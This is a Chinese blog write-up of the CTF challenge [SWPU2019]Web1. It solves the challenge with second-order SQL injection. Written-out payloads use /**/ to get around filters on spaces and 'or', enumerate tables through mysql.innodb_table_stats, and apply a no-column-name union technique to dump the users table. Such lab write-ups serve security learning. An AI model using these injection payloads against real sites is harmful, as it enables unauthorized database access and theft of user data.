[SWPU2019]Web1 二次注入+无列名注入

已于 2024-08-05 18:17:33 修改
阅读量709 收藏 12
点赞数 11
分类专栏: CTF web题目 文章标签: web安全
于 2024-07-27 19:33:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/140737386
版权

上来看到两个功能,登录和注册,看到登录框直接sqlmap嗦一下

失败

注册admin显示被注册,那就注册一个账密都为aaa

登录进来发现两个功能点

发了一个广告却显示代管理确认,这里肯定没有管理员,所以我们得想办法自己上去admin账户,应该可以传个webshell上来自己确认

然而,我把注册登录的数据包找遍了都没找到任何与权限相关的东西,只有个随机生成的td_cookie,没什么用。爆破了一下admin的密码还是无所获

看样子可能还是sql注入,找找注入点吧

点击这个进去发现一个id,经过一番尝试无任何回显

那就只有最后一个功能点广告申请了,抓包试试

加个单引号没报错,但当我输入1' order by 1--在title里面时保敏感词汇了,找到注入点了!

弹敏感词汇我们先试试看看过滤的什么东西

最终我发现了过滤了or # --+  --和空格

尝试取反也无法绕过or

过滤or的话可以使用-1 union select 1,2,3,...n 来试试,如果列数不相符也会报错

使用下面这个python脚本生成一个字典进行爆破

my_dict = {}
for i in range(1, 31):
    my_dict[i] = ",".join(str(x) for x in range(1, i+1))

for key, value in my_dict.items():
    print(key, value)

过滤空格可以使用/**/   ()  /  %20  + 等来进行拼接,构造payload:-1'/**/union/**/select/**/n

爆破需要分批,广告数量有限制,这玩意还需要自己点进去看!

到23时报错不同列数说明查询列数为22,你们直接拿这个下面这个试吧,太麻烦!

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

根据22的广告发现回显位数为2和3

构造payload:

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

库名就为web1

普通的payload是从INFORMATION_SCHEMA.SCHEMATA里面查,但是这里限制了我们对这张表进行访问,无法通过这张表查询数据

下面内容来自这篇文章用innodb_index_stats和innodb_table_stats查找表名_dios mysql-CSDN博客

在MySQL 5.6及更高版本中,我注意到InnoDB创建了2个新表。“ innodb_index_stats”和“ innodb_table_stats”。这两个表都包含所有新创建的数据库和表的数据库和表名

不过InnoDB不存储列,并且存放表的字段名为table_name

更新后的payload:

-1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

成功查到表名为ads,users

这里ads多半是存放广告数据的表,我们直接看users表

因为系统表被禁掉加上上面两张表不存放column,我们这里采用无列名注入不查询列名直接拿数据

内查询的结果需要一个别名

构造payload:-1'/**/union/**/select/**/1,(select/**/group_concat(c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)/**/as/**/d),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

不要其他列的别名的话查询第几列的结果需要用``包裹

这个payload:-1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)/**/as/**/d),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

也是可以的

得到flag

孤丞OVO
关注
  • 11
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
基于Python+Flask+MySQL开发SWPU数据库原理及应用大作业《西柚外卖订餐系统》
07-23
> 本项目为SWPU数据库原理及应用大作业,在线外卖订餐系统《西柚の外卖屋》, 基于[Flask]框架+MySQL数据库开发,轻量简洁。 #### 项目模块及功能介绍 本系统包括登录模块、注册模块、商家用户模块、买家用户模块...
基于Python+Flask+MySQL+SWPU数据库原理开发最流行的外卖订餐系统+源码+开发文档(高分优秀项目)
05-10
基于Python+Flask+MySQL+SWPU数据库原理开发最流行的外卖订餐系统+源码+开发文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 项目简介: 本系统包括登录模块...
SWPU大数据概论课程报告
01-31
《SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 70
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
【网络安全】分析cookie实现PII IDOR
等风来
08-27 187
目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-30 1195
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】绕过输入验证
等风来
08-27 215
输入验证是检查用户输入的数据是否符合特定要求和约束的过程,这个过程通常发生在注册时填写信息时。它对于确保应用程序的安全性至关重要,因为不当的输入可能会引发严重的安全漏洞
自学黑客(网络安全
2301_77160226的博客
08-31 2420
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全售前入门03——审计类产品了解
打工人
08-25 1265
为方便初接触网络安全售前工作的小伙伴了解网安行业情况,我制作一系统售前入门(安全产品,安全服务,法律法规等)文章介绍,希望能给初进网安职场的小伙伴提供一点帮助。仅适合入门小白。
【网络安全】Instagram 和 Meta 2FA 绕过漏洞
最新发布
等风来
09-01 70
该漏洞允许攻击者绕过 Meta 的双重身份验证 (2FA) 机制,实现账户接管;并且也能够绕过 Instagram 的双重身份验证 (2FA) 机制,实现账户接管。
【网络安全】绕过Referer实现CSRF
等风来
08-28 583
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种攻击方式,其中攻击者诱使用户在已登录的情况下执行不安全的操作。例如,攻击者可能诱导用户访问一个恶意网站B,B网站上可能会发送伪造的请求到用户已经登录的A网站,从而执行一些未经授权的操作,比如从A网站转账给hacker。这个时候,请求是由B网站发送至A网站的。为了防御CSRF,即确保A网站的服务器只处理来自于一个合法的、可信的来源,Referer就产生了。Referer 是 HTTP 请求头中的一个字段,表示用户当前页面的来源
【网络安全】XSS+OTP绕过+账户接管
等风来
09-01 89
因此,能够实现接管账户,但此漏洞需要用户交互,危害程度降低。
【网络安全】XSS之HttpOnly防护(附实战案例)
等风来
09-01 167
HttpOnly作为一种重要的安全标志,主要用于防止攻击者通过XSS攻击窃取用户的Cookie数据,从而保护会话安全。在实现时,开发者只需要在设置Cookie时添加HttpOnly属性即可。然而,HttpOnly并不能完全消除XSS攻击的威胁,但在配合其他安全措施如Content Security Policy(CSP)和严格的输入验证时,能够有效提高Web应用的安全性。
IP地址与SSL证书:保障网络安全的关键
alsknv的博客
08-28 835
在数字时代,网络安全至关重要,而SSL(安全套接层)证书作为加密用户与服务器之间数据传输的利器,扮演着不可或缺的角色。然而,谈及SSL证书时,一个常见的误区是它们通常与域名绑定,而非直接关联到IP地址。尽管如此,了解IP地址与SSL证书的关系及其使用场景,对于构建安全的网络环境同样重要。
网络安全总结①
qq_65150735的博客
08-27 416
网络安全基础总结
【网络安全】WordPress Uncontrolled Resource Consumption
等风来
09-01 91
WordPress 是全球最广泛使用的内容管理系统(CMS),目前约有 43% 的网站依赖于它。由于其用户友好的界面和丰富的插件功能,WordPress 成为了全球最受欢迎的 CMS。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值